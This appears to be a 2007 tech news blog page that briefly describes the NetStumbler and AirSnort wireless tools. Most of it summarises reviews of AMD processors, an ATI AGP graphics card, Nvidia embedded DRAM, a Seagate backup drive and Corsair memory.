Network Stumbler is a free Windows 802.11 (wireless) Sniffer. This tool finds open wireless access points, or “wardriving”, as it is most often referred to. They also distribute a WinCE version for PDAs known as Ministumbler. This tool is free but for Windows-only and no source code is provided by its maker.

AirSnort
http://airsnort.shmoo.com/

AirSnort is an 802.11 WEP encryption cracking tool for local area networks. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. AirSnort is a Linux based program that can be installed on a Windows computer, but is a little tricky to do so.

Microsoft Vulnerability

AMD Conquering 3GHz: Athlon 64 X2 6000+ CPU

X-bit Labs take a look at the AMD Athlon 64 X2 6000+ CPU, the fastest Athlon 64 to date.

The new CPU comes officially clocked at 3 GHz with 1 MB of L2 cache per core. This is the same speed that AMD's Athlon 64 FX-74 chip, which was introduced last year near the end of November, runs at. The core is the same Windsor core which AMD has already used for a couple of its processors, namely the Athlon 64 X2 and Athlon 64 FX-62 solutions. As we briefly discussed earlier, the Athlon 64 X2 6000+ still uses a 90nm manufacturing process. The official price for a single Athlon 64 X2 6400+ in a quantity of 1,000 is $464. The next AMD part with the most similar amount of features, the FX-74, is available at a price of $1,000. Keep in mind, however, that the FX-74 figure is for two processors since a complete package must be bought. In addition, the FX-74 can only be used with AMD's Quad FX platform. AMD declares the maximum thermal power of the Athlon 64 X2 6000+ at 125 W, a figure that is identical to the maximum thermal power of the Athlon 64 FX-62 which also happens to be 200 MHz slower. Nominal voltage is between 1.35V and 1.40V, the same value for other Athlon 64 X2 90nm processors. The integrated memory controller uses a divider set at 8.

Two factors make overclocking headroom for the new AMD CPU limited. For one, the processor is the highest clocked Athlon 64 X2 processor in commerce, meaning that AMD has already pushed the processor to its limit. In addition, the fact that the Athlon 64 X2 6000+ is manufactured using a 90nm makes it even tougher to have high overclocking hopes for the processor. Please also keep in mind that overclocking capabilities usually vary chip to chip. Although we might be able to reach high overclocks with some of our chips, there is no guarantee that another would perform exactly the same. The maximum frequency our engineering sample reached in the overclocking tests was 3.255 GHz. We reached this frequency by increasing the bus frequency to 217 MHz and keeping the multiplier at its default 15x. To maintain system stability at this level, the operation required a very slight overvolt. As our tests confirm, the overclocking headroom on Athlon 64 6000+ processors is rather limited, primarily because of the 90nm manufacturing process.

Despite its significantly higher performance rating and $459 retail price, the new AMD Athlon 64 X2 6000+ processor can only compete successfully with Intel Core 2 Duo E6600, though not in all applications. From the price-to-performance prospective it is losing to the Intel Core 2 Duo at this time. So, the newcomer will have really hard times winning the user's hearts. At least until the prices go down again.

Another reviews can be found on AnandTech, HotHardware, T-Break.
AMD has also launched new single-core Athlon 64 3500+ and Athlon 64 3800+ processors based on its new 65nm process. The two chips run at the same respective 2.2GHz and 2.4GHz clock speeds with the same 512KB of cache as their 90nm predecessors, and they have rated power consumption of just 45W. The 45W Athlon 64 3500+ is launching at $88, while the 3800+ is $93.

Thursday, March 08, 2007

Sapphire Radeon X1950 PRO AGP Tested

EliteBastards take a further look at the Sapphire Radeon X1950 PRO AGP. The most obvious difference in Sapphire's Radeon X1950 PRO over a reference board is the inclusion of a RIALTO bridge chip on its rear, allowing for it the core to be used on an AGP interface. That aside, this board also finds itself with smallcore and memory clock speed boosts over reference speeds, sporting a core clock of 580MHz, with memory clocked at 700MHz - An increase of 5 and 10MHz respectively. To cap it all off, Sapphire have doubled the frame buffer of this board over the reference design, equipping it with 512MB of GDDR3 memory. Impressive stuff indeed.

As review conclusions go, this is a pretty simple one to wrap up in essence - The Radeon X1950 PRO is the fastest, most fully featured graphics board money can buy that makes use of the AGP interface. It brings everything that we loved about RV570 on PCI Express - Great performance and a very solid feature set at a decent price point - Then leverages the lack of competition in the AGP arena to make it look like a King amongst Men. Well, a King amongst graphics boards at least.

As far as Sapphire's Radeon X1950 PRO goes, this most excellent board is complemented nicely by the use of a single-slot cooler, and a very comprehensive bundle that gives you everything you could possibly need, befitting of its high-end stature for the interface on which it resides. There also seems to be little in the way of a price increase over the PCI Express variant of this SKU, which is great to see as well.

Of course, we do have to put forth some negatives for this board, the biggest of which is its power requirements - The need for two Molex connectors may require some juggling of your power supply connectors, if not even upgrading your PSU if it isn't up to the job. High Definition playback also wasn't up to scratch - Considering we witnessed frames dropped on both ATI and NVIDIA AGP boards, it suggests to me than H.264 and this ageing interface simply don't sit well together.

Nvidia Creates First Graphics Chip with Embedded DRAM

TSMC and Nvidia today announced that TSMC has successfully produced a fully-functional sample of a graphics chip for handheld devices with embedded DRAM. While there are no details about the product, it once again shows the interest of a leading graphics chips designer towards the eDRAM technology.

TSMC's 65nm embedded DRAM process and IP shrinks the cell and macro size by nearly 50 percent compared to its previous generation. The foundry is targeting the higher bandwidth offered by the embedded DRAM at applications such as game consoles, high-end networking, digital consumer, and multimedia processors. The embedded DRAM allows for some of the key power-saving tricks being tapped by designers today, including sleep mode, partial power cut-off and on-chip temperature compensation, while also improving data retention time. The 65-nm embedded DRAM process is built on up to 10 metal layers using copper low-k interconnect and nickel silicide transistor interconnect, the company said. The cell size is less than a quarter of its SRAM counterpart, and macro densities range from 4Mbits to 256Mbits. TSMC began its 65-nm logic production in the second quarter of 2006. It's 90-nm embedded DRAM process has run since the first quarter of 2006.

Seagate 750GB Pushbutton Backup External Hard Drive

TechArp takes a look at the Seagate 750GB Pushbutton Backup External Hard Drive:

Performance-wise, the 750GB Pushbutton Backup had faster read and burst speeds than the VIZO Luxon USB enclosure which we paired with the 750GB Barracuda 7200.10 hard drive. However, the Pushbutton Backup drive was about 9% slower than the Luxon enclosure in the High-End Disk WinMark 99 test. Other than that, both drives had about the same performance characteristics. Since the
Pushbutton Backup drive is using the same 750GB Barracuda 7200.10 hard drive or a similar model to the one used with the VIZO Luxon enclosure, any performance difference is due to the SATA-USB controller used. It's good to see that the Pushbutton Backup's controller is no performance slouch.

However, those who buy the Pushbutton Backup will not be buying it merely based on its performance. Its large capacity will be a major sell factor, offering
more capacity than competing backup solutions. Those who require a lot of backup capacity will certainly be interested in this drive. Potential buyers will also
be interested in its ease of use and reliability. While we can attest to its ease of use (it literally works out of the box!), we find the 1-year limited warranty quite peculiar since the Barracuda 7200.10 hard drive itself comes with a 5-year warranty. Seagate should really give the Pushbutton Backup drive an equivalent warranty.

In conclusion, the Seagate 750GB Pushbutton Backup is really not for everyone. If you are a hardware enthusiast, it would be better and cheaper to buy a Seagate 750GB Barracuda 7200.10 hard drive and install it into an external USB hard drive enclosure. You will even have full 5-years of warranty on the hard
drive.

Corsair 2GB PC2-10000C5DF Dominator Memory Kit tested

Legit Reviews has posted a review on the Corsair 2GB PC2-10000C5DF Dominator Memory Kit which are rated for operation at 1250MHz. These recently released modules are optimized for the new NVIDIA nForce 680i SLI-base platform. In addition, the pair of Corsair CM1X1024-10000C5D modules utilize the latest Corsair in heat sink design thanks to their use of the awesome looking black DOMINATOR heat sinks. These heat sinks have Dual-Path Heat Xchange (DHX) technology and can be coupled with the Corsair Dominator Airflow Fan to help keep the modules nice and cool.

One of the major selling points of this kit is that Corsair put together the complete package for consumers. By bundling the Corsair AIRFLOW with the modules it makes for the best overclocking experience we have ever had right out of the box. Just minutes after opening the retail packaging we had the modules up and running above 1300MHz, which is crazy seeing how a couple years ago those speeds were impossible to reach. It makes you wonder what speeds will be reached by the end of the year if things keep going like this.

The performance of the Corsair TWIN2X2048-10000C5SDF 2GB DDR2-10000 Dominator Series was nothing less than impressive. Having the ability to run CAS 3 at 853MHz, CAS 4 at 1135MHz and CAS 5 at 1314MHz makes wide range of options for enthusiasts and just happen to be some of the best timings that we have ever seen at 2.4V. I can't say enough good things about the overclocking of these modules as they are really impressive. If you don't overclock and adjust the timings on this kit you are really missing out!
When it comes to pricing these modules do cost more than most, but to be honest you get what you pay for with these modules. I've personally had the chance to use several of these TWIN2X2048-10000C5DF memory kits and every single one would do over 1310MHz with CAS 5 timings right out of the box. A number of smaller companies often send out hand picked samples to 'beta testers' and tell them to post the results around the internet. What happens is people order them quickly find out that their modules can't reach near the speeds they saw these other people reaching. Instead of buying two or more kits trying to find a great set of overclockers save yourself some time and let Corsair do the sorting for you. The fallout rate on finding the right Micron IC's is really high and the supply is tight, so the $649.00 price tag makes sense if you look at the numbers.

AMD Athlon64 X2 4800+ 65nm tested

PC Stats published a review of the AMD Athlon64 X2 4800+ 65nm Processor which comes clocked at a cool 2.5 GHz, with a 12.5x CPU clock multiplier (12.5 x 200 MHz = 2500 MHz). Each core in this dual core Athlon64 X2 4800+ CPU has a 128KB L1 cache along with a 512KB L2 cache. This is a bit different from what AMD did with its Socket 939 series Athlon64 X2 4800+, it ran at 2.4 GHz and had 1MB L2 cache per core.

At 173W (total system power draw) with both cores running at
100%, the 65nm Athlon64 X2 4800+ system uses 4W less energy than the 90nm Athlon64 X2 5000+ with only one core maxed out! The Athlon64 X2 4800+ system consumes 70W less than the Intel Pentium D 940 test rig. Aside from the die shrink from 90nm to 65nm, the AMD Athlon64 X2 4800+ has no significant advancements over previous Socket AM2 Athlon64 processors. AMD has increased the L2 cache latency a bit, in preparation for larger L2 cache K8 processors coming down the pipeline. When we will see these beasts materialize is not known. This does however mean that clock for clock the 65nm processors are just slightly slower than its 90nm counterparts, but as an end user, you won't be able to tell the difference.

As we saw in the benchmarks the Socket AM2 AMD Athlon64 X2 4800+ processor is pretty quick around the track. It slots itself right behind the Athlon64 X2 5000+, exactly where we expect it. The chip offers up good performance for the money. The 65 nm Athlon64 X2 4800+ was a pretty good overclocker, hitting 3.03 GHz in PCSTATS tests. With a retail price of $253 CDN ($215 US, £112GBP) the AMD Athlon64 X2 4800+ is a good balance between performance and value. Its small energy efficient gains will make it less expensive to run in the long term, but with the energy efficiencies posed by the Core 2 Duo, you have to wonder if this is almost a moot point.